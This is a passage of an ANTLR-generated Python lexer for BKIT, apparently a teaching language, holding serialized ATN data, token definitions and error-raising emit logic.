buf.write(\"\\u0083\\u01fb\\3\\2\\2\\2\\u0085\\u01fd\\3\\2\\2\\2\\u0087\\u0200\\3\")\n buf.write(\"\\2\\2\\2\\u0089\\u0203\\3\\2\\2\\2\\u008b\\u0207\\3\\2\\2\\2\\u008d\\u020a\")\n buf.write(\"\\3\\2\\2\\2\\u008f\\u020d\\3\\2\\2\\2\\u0091\\u0211\\3\\2\\2\\2\\u0093\")\n buf.write(\"\\u0215\\3\\2\\2\\2\\u0095\\u0217\\3\\2\\2\\2\\u0097\\u0219\\3\\2\\2\\2\")\n buf.write(\"\\u0099\\u021b\\3\\2\\2\\2\\u009b\\u021d\\3\\2\\2\\2\\u009d\\u021f\\3\")\n buf.write(\"\\2\\2\\2\\u009f\\u0221\\3\\2\\2\\2\\u00a1\\u0223\\3\\2\\2\\2\\u00a3\\u0225\")\n buf.write(\"\\3\\2\\2\\2\\u00a5\\u0227\\3\\2\\2\\2\\u00a7\\u0229\\3\\2\\2\\2\\u00a9\")\n buf.write(\"\\u00aa\\5\\u009bN\\2\\u00aa\\u00ab\\3\\2\\2\\2\\u00ab\\u00ac\\5\\u009d\")\n buf.write(\"O\\2\\u00ac\\4\\3\\2\\2\\2\\u00ad\\u00b2\\5\\23\\n\\2\\u00ae\\u00b1\\5\")\n buf.write(\"\\23\\n\\2\\u00af\\u00b1\\5\\27\\f\\2\\u00b0\\u00ae\\3\\2\\2\\2\\u00b0\")\n buf.write(\"\\u00af\\3\\2\\2\\2\\u00b1\\u00b4\\3\\2\\2\\2\\u00b2\\u00b0\\3\\2\\2\\2\")\n buf.write(\"\\u00b2\\u00b3\\3\\2\\2\\2\\u00b3\\6\\3\\2\\2\\2\\u00b4\\u00b2\\3\\2\\2\")\n buf.write(\"\\2\\u00b5\\u00b9\\7$\\2\\2\\u00b6\\u00b8\\5\\'\\24\\2\\u00b7\\u00b6\")\n buf.write(\"\\3\\2\\2\\2\\u00b8\\u00bb\\3\\2\\2\\2\\u00b9\\u00b7\\3\\2\\2\\2\\u00b9\")\n buf.write(\"\\u00ba\\3\\2\\2\\2\\u00ba\\u00bc\\3\\2\\2\\2\\u00bb\\u00b9\\3\\2\\2\\2\")\n buf.write(\"\\u00bc\\u00bd\\5!\\21\\2\\u00bd\\b\\3\\2\\2\\2\\u00be\\u00c2\\7$\\2\")\n buf.write(\"\\2\\u00bf\\u00c1\\5\\'\\24\\2\\u00c0\\u00bf\\3\\2\\2\\2\\u00c1\\u00c4\")\n buf.write(\"\\3\\2\\2\\2\\u00c2\\u00c0\\3\\2\\2\\2\\u00c2\\u00c3\\3\\2\\2\\2\\u00c3\")\n buf.write(\"\\u00c6\\3\\2\\2\\2\\u00c4\\u00c2\\3\\2\\2\\2\\u00c5\\u00c7\\t\\2\\2\\2\")\n buf.write(\"\\u00c6\\u00c5\\3\\2\\2\\2\\u00c7\\u00c8\\3\\2\\2\\2\\u00c8\\u00c9\\b\")\n buf.write(\"\\5\\2\\2\\u00c9\\n\\3\\2\\2\\2\\u00ca\\u00cb\\7,\\2\\2\\u00cb\\u00cc\")\n buf.write(\"\\7,\\2\\2\\u00cc\\u00d0\\3\\2\\2\\2\\u00cd\\u00cf\\13\\2\\2\\2\\u00ce\")\n buf.write(\"\\u00cd\\3\\2\\2\\2\\u00cf\\u00d2\\3\\2\\2\\2\\u00d0\\u00d1\\3\\2\\2\\2\")\n buf.write(\"\\u00d0\\u00ce\\3\\2\\2\\2\\u00d1\\u00d3\\3\\2\\2\\2\\u00d2\\u00d0\\3\")\n buf.write(\"\\2\\2\\2\\u00d3\\u00d4\\7,\\2\\2\\u00d4\\u00d5\\7,\\2\\2\\u00d5\\u00d6\")\n buf.write(\"\\3\\2\\2\\2\\u00d6\\u00d7\\b\\6\\3\\2\\u00d7\\f\\3\\2\\2\\2\\u00d8\\u00d9\")\n buf.write(\"\\7,\\2\\2\\u00d9\\u00da\\7,\\2\\2\\u00da\\u00de\\3\\2\\2\\2\\u00db\\u00dd\")\n buf.write(\"\\13\\2\\2\\2\\u00dc\\u00db\\3\\2\\2\\2\\u00dd\\u00e0\\3\\2\\2\\2\\u00de\")\n buf.write(\"\\u00df\\3\\2\\2\\2\\u00de\\u00dc\\3\\2\\2\\2\\u00df\\u00e1\\3\\2\\2\\2\")\n buf.write(\"\\u00e0\\u00de\\3\\2\\2\\2\\u00e1\\u00e2\\7\\2\\2\\3\\u00e2\\16\\3\\2\")\n buf.write(\"\\2\\2\\u00e3\\u00e4\\t\\3\\2\\2\\u00e4\\20\\3\\2\\2\\2\\u00e5\\u00e7\")\n buf.write(\"\\t\\4\\2\\2\\u00e6\\u00e5\\3\\2\\2\\2\\u00e7\\u00e8\\3\\2\\2\\2\\u00e8\")\n buf.write(\"\\u00e6\\3\\2\\2\\2\\u00e8\\u00e9\\3\\2\\2\\2\\u00e9\\u00ea\\3\\2\\2\\2\")\n buf.write(\"\\u00ea\\u00eb\\b\\t\\3\\2\\u00eb\\22\\3\\2\\2\\2\\u00ec\\u00ed\\t\\5\")\n buf.write(\"\\2\\2\\u00ed\\24\\3\\2\\2\\2\\u00ee\\u00ef\\t\\6\\2\\2\\u00ef\\26\\3\\2\")\n buf.write(\"\\2\\2\\u00f0\\u00f1\\t\\7\\2\\2\\u00f1\\30\\3\\2\\2\\2\\u00f2\\u00f5\")\n buf.write(\"\\5\\23\\n\\2\\u00f3\\u00f5\\5\\25\\13\\2\\u00f4\\u00f2\\3\\2\\2\\2\\u00f4\")\n buf.write(\"\\u00f3\\3\\2\\2\\2\\u00f5\\32\\3\\2\\2\\2\\u00f6\\u00f8\\t\\b\\2\\2\\u00f7\")\n buf.write(\"\\u00f9\\5i\\65\\2\\u00f8\\u00f7\\3\\2\\2\\2\\u00f8\\u00f9\\3\\2\\2\\2\")\n buf.write(\"\\u00f9\\u00fb\\3\\2\\2\\2\\u00fa\\u00fc\\5\\27\\f\\2\\u00fb\\u00fa\")\n buf.write(\"\\3\\2\\2\\2\\u00fc\\u00fd\\3\\2\\2\\2\\u00fd\\u00fb\\3\\2\\2\\2\\u00fd\")\n buf.write(\"\\u00fe\\3\\2\\2\\2\\u00fe\\34\\3\\2\\2\\2\\u00ff\\u0103\\t\\t\\2\\2\\u0100\")\n buf.write(\"\\u0102\\5\\27\\f\\2\\u0101\\u0100\\3\\2\\2\\2\\u0102\\u0105\\3\\2\\2\")\n buf.write(\"\\2\\u0103\\u0101\\3\\2\\2\\2\\u0103\\u0104\\3\\2\\2\\2\\u0104\\36\\3\")\n buf.write(\"\\2\\2\\2\\u0105\\u0103\\3\\2\\2\\2\\u0106\\u0108\\5\\27\\f\\2\\u0107\")\n buf.write(\"\\u0106\\3\\2\\2\\2\\u0108\\u0109\\3\\2\\2\\2\\u0109\\u0107\\3\\2\\2\\2\")\n buf.write(\"\\u0109\\u010a\\3\\2\\2\\2\\u010a\\u0110\\3\\2\\2\\2\\u010b\\u010d\\5\")\n buf.write(\"\\35\\17\\2\\u010c\\u010e\\5\\33\\16\\2\\u010d\\u010c\\3\\2\\2\\2\\u010d\")\n buf.write(\"\\u010e\\3\\2\\2\\2\\u010e\\u0111\\3\\2\\2\\2\\u010f\\u0111\\5\\33\\16\")\n buf.write(\"\\2\\u0110\\u010b\\3\\2\\2\\2\\u0110\\u010f\\3\\2\\2\\2\\u0111 \\3\\2\")\n buf.write(\"\\2\\2\\u0112\\u0113\\7^\\2\\2\\u0113\\u0114\\n\\n\\2\\2\\u0114\\\"\\3\")\n buf.write(\"\\2\\2\\2\\u0115\\u0116\\7^\\2\\2\\u0116\\u0117\\t\\n\\2\\2\\u0117$\\3\")\n buf.write(\"\\2\\2\\2\\u0118\\u0119\\7)\\2\\2\\u0119\\u011a\\7$\\2\\2\\u011a&\\3\")\n buf.write(\"\\2\\2\\2\\u011b\\u011f\\n\\13\\2\\2\\u011c\\u011f\\5#\\22\\2\\u011d\")\n buf.write(\"\\u011f\\5%\\23\\2\\u011e\\u011b\\3\\2\\2\\2\\u011e\\u011c\\3\\2\\2\\2\")\n buf.write(\"\\u011e\\u011d\\3\\2\\2\\2\\u011f(\\3\\2\\2\\2\\u0120\\u0121\\t\\f\\2\")\n buf.write(\"\\2\\u0121*\\3\\2\\2\\2\\u0122\\u0123\\t\\r\\2\\2\\u0123,\\3\\2\\2\\2\\u0124\")\n buf.write(\"\\u0125\\7\\62\\2\\2\\u0125\\u0129\\7z\\2\\2\\u0126\\u0127\\7\\62\\2\")\n buf.write(\"\\2\\u0127\\u0129\\7Z\\2\\2\\u0128\\u0124\\3\\2\\2\\2\\u0128\\u0126\")\n buf.write(\"\\3\\2\\2\\2\\u0129\\u012b\\3\\2\\2\\2\\u012a\\u012c\\5)\\25\\2\\u012b\")\n buf.write(\"\\u012a\\3\\2\\2\\2\\u012c\\u012d\\3\\2\\2\\2\\u012d\\u012b\\3\\2\\2\\2\")\n buf.write(\"\\u012d\\u012e\\3\\2\\2\\2\\u012e.\\3\\2\\2\\2\\u012f\\u0131\\5\\27\\f\")\n buf.write(\"\\2\\u0130\\u012f\\3\\2\\2\\2\\u0131\\u0132\\3\\2\\2\\2\\u0132\\u0130\")\n buf.write(\"\\3\\2\\2\\2\\u0132\\u0133\\3\\2\\2\\2\\u0133\\60\\3\\2\\2\\2\\u0134\\u0135\")\n buf.write(\"\\7\\62\\2\\2\\u0135\\u0139\\7q\\2\\2\\u0136\\u0137\\7\\62\\2\\2\\u0137\")\n buf.write(\"\\u0139\\7Q\\2\\2\\u0138\\u0134\\3\\2\\2\\2\\u0138\\u0136\\3\\2\\2\\2\")\n buf.write(\"\\u0139\\u013b\\3\\2\\2\\2\\u013a\\u013c\\5+\\26\\2\\u013b\\u013a\\3\")\n buf.write(\"\\2\\2\\2\\u013c\\u013d\\3\\2\\2\\2\\u013d\\u013b\\3\\2\\2\\2\\u013d\\u013e\")\n buf.write(\"\\3\\2\\2\\2\\u013e\\62\\3\\2\\2\\2\\u013f\\u0143\\5/\\30\\2\\u0140\\u0143\")\n buf.write(\"\\5-\\27\\2\\u0141\\u0143\\5\\61\\31\\2\\u0142\\u013f\\3\\2\\2\\2\\u0142\")\n buf.write(\"\\u0140\\3\\2\\2\\2\\u0142\\u0141\\3\\2\\2\\2\\u0143\\64\\3\\2\\2\\2\\u0144\")\n buf.write(\"\\u0145\\5\\37\\20\\2\\u0145\\66\\3\\2\\2\\2\\u0146\\u0149\\5_\\60\\2\")\n buf.write(\"\\u0147\\u0149\\5a\\61\\2\\u0148\\u0146\\3\\2\\2\\2\\u0148\\u0147\\3\")\n buf.write(\"\\2\\2\\2\\u01498\\3\\2\\2\\2\\u014a\\u014e\\7$\\2\\2\\u014b\\u014d\\5\")\n buf.write(\"\\'\\24\\2\\u014c\\u014b\\3\\2\\2\\2\\u014d\\u0150\\3\\2\\2\\2\\u014e\")\n buf.write(\"\\u014c\\3\\2\\2\\2\\u014e\\u014f\\3\\2\\2\\2\\u014f\\u0151\\3\\2\\2\\2\")\n buf.write(\"\\u0150\\u014e\\3\\2\\2\\2\\u0151\\u0152\\7$\\2\\2\\u0152\\u0153\\b\")\n buf.write(\"\\35\\4\\2\\u0153:\\3\\2\\2\\2\\u0154\\u0155\\7D\\2\\2\\u0155\\u0156\")\n buf.write(\"\\7q\\2\\2\\u0156\\u0157\\7f\\2\\2\\u0157\\u0158\\7{\\2\\2\\u0158<\\3\")\n buf.write(\"\\2\\2\\2\\u0159\\u015a\\7D\\2\\2\\u015a\\u015b\\7t\\2\\2\\u015b\\u015c\")\n buf.write(\"\\7g\\2\\2\\u015c\\u015d\\7c\\2\\2\\u015d\\u015e\\7m\\2\\2\\u015e>\\3\")\n buf.write(\"\\2\\2\\2\\u015f\\u0160\\7E\\2\\2\\u0160\\u0161\\7q\\2\\2\\u0161\\u0162\")\n buf.write(\"\\7p\\2\\2\\u0162\\u0163\\7v\\2\\2\\u0163\\u0164\\7k\\2\\2\\u0164\\u0165\")\n buf.write(\"\\7p\\2\\2\\u0165\\u0166\\7w\\2\\2\\u0166\\u0167\\7g\\2\\2\\u0167@\\3\")\n buf.write(\"\\2\\2\\2\\u0168\\u0169\\7F\\2\\2\\u0169\\u016a\\7q\\2\\2\\u016aB\\3\")\n buf.write(\"\\2\\2\\2\\u016b\\u016c\\7G\\2\\2\\u016c\\u016d\\7n\\2\\2\\u016d\\u016e\")\n buf.write(\"\\7u\\2\\2\\u016e\\u016f\\7g\\2\\2\\u016fD\\3\\2\\2\\2\\u0170\\u0171\")\n buf.write(\"\\7G\\2\\2\\u0171\\u0172\\7n\\2\\2\\u0172\\u0173\\7U\\2\\2\\u0173\\u0174\")\n buf.write(\"\\7g\\2\\2\\u0174\\u0175\\7n\\2\\2\\u0175\\u0176\\7h\\2\\2\\u0176F\\3\")\n buf.write(\"\\2\\2\\2\\u0177\\u0178\\7G\\2\\2\\u0178\\u0179\\7n\\2\\2\\u0179\\u017a\")\n buf.write(\"\\7u\\2\\2\\u017a\\u017b\\7g\\2\\2\\u017b\\u017c\\7K\\2\\2\\u017c\\u017d\")\n buf.write(\"\\7h\\2\\2\\u017dH\\3\\2\\2\\2\\u017e\\u017f\\7G\\2\\2\\u017f\\u0180\")\n buf.write(\"\\7p\\2\\2\\u0180\\u0181\\7f\\2\\2\\u0181\\u0182\\7K\\2\\2\\u0182\\u0183\")\n buf.write(\"\\7h\\2\\2\\u0183J\\3\\2\\2\\2\\u0184\\u0185\\7G\\2\\2\\u0185\\u0186\")\n buf.write(\"\\7p\\2\\2\\u0186\\u0187\\7f\\2\\2\\u0187\\u0188\\7H\\2\\2\\u0188\\u0189\")\n buf.write(\"\\7q\\2\\2\\u0189\\u018a\\7t\\2\\2\\u018aL\\3\\2\\2\\2\\u018b\\u018c\")\n buf.write(\"\\7G\\2\\2\\u018c\\u018d\\7p\\2\\2\\u018d\\u018e\\7f\\2\\2\\u018e\\u018f\")\n buf.write(\"\\7Y\\2\\2\\u018f\\u0190\\7j\\2\\2\\u0190\\u0191\\7k\\2\\2\\u0191\\u0192\")\n buf.write(\"\\7n\\2\\2\\u0192\\u0193\\7g\\2\\2\\u0193N\\3\\2\\2\\2\\u0194\\u0195\")\n buf.write(\"\\7H\\2\\2\\u0195\\u0196\\7q\\2\\2\\u0196\\u0197\\7t\\2\\2\\u0197P\\3\")\n buf.write(\"\\2\\2\\2\\u0198\\u0199\\7H\\2\\2\\u0199\\u019a\\7w\\2\\2\\u019a\\u019b\")\n buf.write(\"\\7p\\2\\2\\u019b\\u019c\\7e\\2\\2\\u019c\\u019d\\7v\\2\\2\\u019d\\u019e\")\n buf.write(\"\\7k\\2\\2\\u019e\\u019f\\7q\\2\\2\\u019f\\u01a0\\7p\\2\\2\\u01a0R\\3\")\n buf.write(\"\\2\\2\\2\\u01a1\\u01a2\\7K\\2\\2\\u01a2\\u01a3\\7h\\2\\2\\u01a3T\\3\")\n buf.write(\"\\2\\2\\2\\u01a4\\u01a5\\7R\\2\\2\\u01a5\\u01a6\\7c\\2\\2\\u01a6\\u01a7\")\n buf.write(\"\\7t\\2\\2\\u01a7\\u01a8\\7c\\2\\2\\u01a8\\u01a9\\7o\\2\\2\\u01a9\\u01aa\")\n buf.write(\"\\7g\\2\\2\\u01aa\\u01ab\\7v\\2\\2\\u01ab\\u01ac\\7g\\2\\2\\u01ac\\u01ad\")\n buf.write(\"\\7t\\2\\2\\u01adV\\3\\2\\2\\2\\u01ae\\u01af\\7T\\2\\2\\u01af\\u01b0\")\n buf.write(\"\\7g\\2\\2\\u01b0\\u01b1\\7v\\2\\2\\u01b1\\u01b2\\7w\\2\\2\\u01b2\\u01b3\")\n buf.write(\"\\7t\\2\\2\\u01b3\\u01b4\\7p\\2\\2\\u01b4X\\3\\2\\2\\2\\u01b5\\u01b6\")\n buf.write(\"\\7V\\2\\2\\u01b6\\u01b7\\7j\\2\\2\\u01b7\\u01b8\\7g\\2\\2\\u01b8\\u01b9\")\n buf.write(\"\\7p\\2\\2\\u01b9Z\\3\\2\\2\\2\\u01ba\\u01bb\\7X\\2\\2\\u01bb\\u01bc\")\n buf.write(\"\\7c\\2\\2\\u01bc\\u01bd\\7t\\2\\2\\u01bd\\\\\\3\\2\\2\\2\\u01be\\u01bf\")\n buf.write(\"\\7Y\\2\\2\\u01bf\\u01c0\\7j\\2\\2\\u01c0\\u01c1\\7k\\2\\2\\u01c1\\u01c2\")\n buf.write(\"\\7n\\2\\2\\u01c2\\u01c3\\7g\\2\\2\\u01c3^\\3\\2\\2\\2\\u01c4\\u01c5\")\n buf.write(\"\\7V\\2\\2\\u01c5\\u01c6\\7t\\2\\2\\u01c6\\u01c7\\7w\\2\\2\\u01c7\\u01c8\")\n buf.write(\"\\7g\\2\\2\\u01c8`\\3\\2\\2\\2\\u01c9\\u01ca\\7H\\2\\2\\u01ca\\u01cb\")\n buf.write(\"\\7c\\2\\2\\u01cb\\u01cc\\7n\\2\\2\\u01cc\\u01cd\\7u\\2\\2\\u01cd\\u01ce\")\n buf.write(\"\\7g\\2\\2\\u01ceb\\3\\2\\2\\2\\u01cf\\u01d0\\7G\\2\\2\\u01d0\\u01d1\")\n buf.write(\"\\7p\\2\\2\\u01d1\\u01d2\\7f\\2\\2\\u01d2\\u01d3\\7F\\2\\2\\u01d3\\u01d4\")\n buf.write(\"\\7q\\2\\2\\u01d4d\\3\\2\\2\\2\\u01d5\\u01d6\\7-\\2\\2\\u01d6f\\3\\2\\2\")\n buf.write(\"\\2\\u01d7\\u01d8\\7-\\2\\2\\u01d8\\u01d9\\7\\60\\2\\2\\u01d9h\\3\\2\")\n buf.write(\"\\2\\2\\u01da\\u01db\\7/\\2\\2\\u01dbj\\3\\2\\2\\2\\u01dc\\u01dd\\7/\")\n buf.write(\"\\2\\2\\u01dd\\u01de\\7\\60\\2\\2\\u01del\\3\\2\\2\\2\\u01df\\u01e0\\7\")\n buf.write(\",\\2\\2\\u01e0n\\3\\2\\2\\2\\u01e1\\u01e2\\7,\\2\\2\\u01e2\\u01e3\\7\")\n buf.write(\"\\60\\2\\2\\u01e3p\\3\\2\\2\\2\\u01e4\\u01e5\\7^\\2\\2\\u01e5r\\3\\2\\2\")\n buf.write(\"\\2\\u01e6\\u01e7\\7^\\2\\2\\u01e7\\u01e8\\7\\60\\2\\2\\u01e8t\\3\\2\")\n buf.write(\"\\2\\2\\u01e9\\u01ea\\7\\'\\2\\2\\u01eav\\3\\2\\2\\2\\u01eb\\u01ec\\7\")\n buf.write(\"#\\2\\2\\u01ecx\\3\\2\\2\\2\\u01ed\\u01ee\\7(\\2\\2\\u01ee\\u01ef\\7\")\n buf.write(\"(\\2\\2\\u01efz\\3\\2\\2\\2\\u01f0\\u01f1\\7~\\2\\2\\u01f1\\u01f2\\7\")\n buf.write(\"~\\2\\2\\u01f2|\\3\\2\\2\\2\\u01f3\\u01f4\\7?\\2\\2\\u01f4\\u01f5\\7\")\n buf.write(\"?\\2\\2\\u01f5~\\3\\2\\2\\2\\u01f6\\u01f7\\7#\\2\\2\\u01f7\\u01f8\\7\")\n buf.write(\"?\\2\\2\\u01f8\\u0080\\3\\2\\2\\2\\u01f9\\u01fa\\7>\\2\\2\\u01fa\\u0082\")\n buf.write(\"\\3\\2\\2\\2\\u01fb\\u01fc\\7@\\2\\2\\u01fc\\u0084\\3\\2\\2\\2\\u01fd\")\n buf.write(\"\\u01fe\\7>\\2\\2\\u01fe\\u01ff\\7?\\2\\2\\u01ff\\u0086\\3\\2\\2\\2\\u0200\")\n buf.write(\"\\u0201\\7@\\2\\2\\u0201\\u0202\\7?\\2\\2\\u0202\\u0088\\3\\2\\2\\2\\u0203\")\n buf.write(\"\\u0204\\7?\\2\\2\\u0204\\u0205\\7^\\2\\2\\u0205\\u0206\\7?\\2\\2\\u0206\")\n buf.write(\"\\u008a\\3\\2\\2\\2\\u0207\\u0208\\7>\\2\\2\\u0208\\u0209\\7\\60\\2\\2\")\n buf.write(\"\\u0209\\u008c\\3\\2\\2\\2\\u020a\\u020b\\7@\\2\\2\\u020b\\u020c\\7\")\n buf.write(\"\\60\\2\\2\\u020c\\u008e\\3\\2\\2\\2\\u020d\\u020e\\7>\\2\\2\\u020e\\u020f\")\n buf.write(\"\\7?\\2\\2\\u020f\\u0210\\7\\60\\2\\2\\u0210\\u0090\\3\\2\\2\\2\\u0211\")\n buf.write(\"\\u0212\\7@\\2\\2\\u0212\\u0213\\7?\\2\\2\\u0213\\u0214\\7\\60\\2\\2\")\n buf.write(\"\\u0214\\u0092\\3\\2\\2\\2\\u0215\\u0216\\7*\\2\\2\\u0216\\u0094\\3\")\n buf.write(\"\\2\\2\\2\\u0217\\u0218\\7+\\2\\2\\u0218\\u0096\\3\\2\\2\\2\\u0219\\u021a\")\n buf.write(\"\\7]\\2\\2\\u021a\\u0098\\3\\2\\2\\2\\u021b\\u021c\\7_\\2\\2\\u021c\\u009a\")\n buf.write(\"\\3\\2\\2\\2\\u021d\\u021e\\7}\\2\\2\\u021e\\u009c\\3\\2\\2\\2\\u021f\")\n buf.write(\"\\u0220\\7\\177\\2\\2\\u0220\\u009e\\3\\2\\2\\2\\u0221\\u0222\\7<\\2\")\n buf.write(\"\\2\\u0222\\u00a0\\3\\2\\2\\2\\u0223\\u0224\\7\\60\\2\\2\\u0224\\u00a2\")\n buf.write(\"\\3\\2\\2\\2\\u0225\\u0226\\7=\\2\\2\\u0226\\u00a4\\3\\2\\2\\2\\u0227\")\n buf.write(\"\\u0228\\7.\\2\\2\\u0228\\u00a6\\3\\2\\2\\2\\u0229\\u022a\\7?\\2\\2\\u022a\")\n buf.write(\"\\u00a8\\3\\2\\2\\2\\33\\2\\u00b0\\u00b2\\u00b9\\u00c2\\u00c6\\u00d0\")\n buf.write(\"\\u00de\\u00e8\\u00f4\\u00f8\\u00fd\\u0103\\u0109\\u010d\\u0110\")\n buf.write(\"\\u011e\\u0128\\u012d\\u0132\\u0138\\u013d\\u0142\\u0148\\u014e\")\n buf.write(\"\\5\\3\\5\\2\\b\\2\\2\\3\\35\\3\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n INT_ARRAY = 1\n ID = 2\n ILLEGAL_ESCAPE = 3\n UNCLOSE_STRING = 4\n COMMENT = 5\n UNTERMINATED_COMMENT = 6\n ERROR_CHAR = 7\n WS = 8\n Integer_literal = 9\n Float_literal = 10\n Boolean_literal = 11\n String_literal = 12\n BODY = 13\n BREAK = 14\n CONTINUE = 15\n DO = 16\n ELSE = 17\n ELSELF = 18\n ELSEIF = 19\n ENDBODY = 20\n ENDFOR = 21\n ENDWHILE = 22\n FOR = 23\n FUNCTION = 24\n IF = 25\n PARAMETER = 26\n RETURN = 27\n THEN = 28\n VAR = 29\n WHILE = 30\n TRUE = 31\n FALSE = 32\n ENDDO = 33\n PLUS_INT = 34\n PLUS_FLOAT = 35\n MINUS_INT = 36\n MINUS_FLOAT = 37\n STAR_INT = 38\n STAR_FLOAT = 39\n DIV_INT = 40\n DIV_FLOAT = 41\n MOD = 42\n NOT = 43\n AND = 44\n OR = 45\n EQUAL = 46\n NOT_EQUAL_INT = 47\n LESS_INT = 48\n GREATER_INT = 49\n LESS_OR_EQUAL_INT = 50\n GREATER_OR_EQUAL_INT = 51\n NOT_EQUAL_FLOAT = 52\n LESS_FLOAT = 53\n GREATER_FLOAT = 54\n LESS_OR_EQUAL_FLOAT = 55\n GREATER_OR_EQUAL_FLOAT = 56\n LEFT_PAREN = 57\n RIGHT_PARENT = 58\n LEFT_BRACKET = 59\n RIGHT_BRACKET = 60\n LEFT_BRACE = 61\n RIGHT_BRACE = 62\n COLON = 63\n DOT = 64\n SEMI = 65\n COMMA = 66\n ASSIGN = 67\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \"'ElSelf'\", \n \"'ElseIf'\", \"'EndIf'\", \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \n \"'If'\", \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \n \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \n \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \"'=\\\\='\", \"'<.'\", \n \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \n \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\", \"'='\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"INT_ARRAY\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \n \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \"Integer_literal\", \n \"Float_literal\", \"Boolean_literal\", \"String_literal\", \"BODY\", \n \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \n \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \n \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PARENT\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\" ]\n\n ruleNames = [ \"INT_ARRAY\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \n \"COMMENT\", \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \n \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \"LETTER\", \n \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \"ILL_ESC_SEQUENCE\", \n \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \"STRING_CHAR\", \n \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \"DECIMAL\", \n \"OCTAL\", \"Integer_literal\", \"Float_literal\", \"Boolean_literal\", \n \"String_literal\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \n \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \"FOR\", \n \"FUNCTION\", \"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \"VAR\", \n \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \n \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \"STAR_FLOAT\", \n \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \n \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \n \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \n \"LEFT_PAREN\", \"RIGHT_PARENT\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \n \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \n \"ASSIGN\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n\n def action(self, localctx:RuleContext, ruleIndex:int, actionIndex:int):\n if self._actions is None:\n actions = dict()\n actions[3] = self.UNCLOSE_STRING_action \n actions[27] = self.String_literal_action \n self._actions = actions\n action = self._actions.get(ruleIndex, None)\n if action is not None:\n action(localctx, actionIndex)\n else:\n raise Exception(\"No registered action for:\" + str(ruleIndex))\n\n\n def UNCLOSE_STRING_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 0:\n\n y = str(self.text);\n self.text = y[1:]\n \n \n\n def String_literal_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 1:\n\n y = str(self.text)\n self.text = y[1:-1]\n \n 